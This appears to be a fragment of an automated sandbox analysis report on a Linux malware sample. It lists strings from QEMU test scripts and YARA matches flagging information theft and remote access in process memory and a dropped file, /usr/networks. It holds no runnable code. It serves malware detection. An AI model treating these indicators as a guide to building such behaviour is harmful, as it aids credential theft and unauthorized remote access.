Source: functions.sh2.30.dr Binary or memory string: # identify_qemu builddir
Source: kvm-test-1-run.sh.30.dr Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh2.30.dr Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.30.dr Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: kvm-test-1-run.sh.30.dr Binary or memory string: if test -s "$resdir/qemu_pid"

Stealing of Sensitive Information

Source: Yara match File source: 5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match File source: ZFvtIZszMd, type: SAMPLE
Source: Yara match File source: 5249.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match File source: 5268.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match File source: 5247.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ZFvtIZszMd PID: 5249, type: MEMORYSTR
Source: Yara match File source: /usr/networks, type: DROPPED
Source: Yara match File source: Process Memory Space: ZFvtIZszMd PID: 5247, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZFvtIZszMd PID: 5268, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match File source: ZFvtIZszMd, type: SAMPLE
Source: Yara match File source: 5249.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match File source: 5268.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match File source: 5247.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ZFvtIZszMd PID: 5249, type: MEMORYSTR
Source: Yara match File source: /usr/networks, type: DROPPED
Source: Yara match File source: Process Memory Space: ZFvtIZszMd PID: 5247, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZFvtIZszMd PID: 5268, type: MEMORYSTR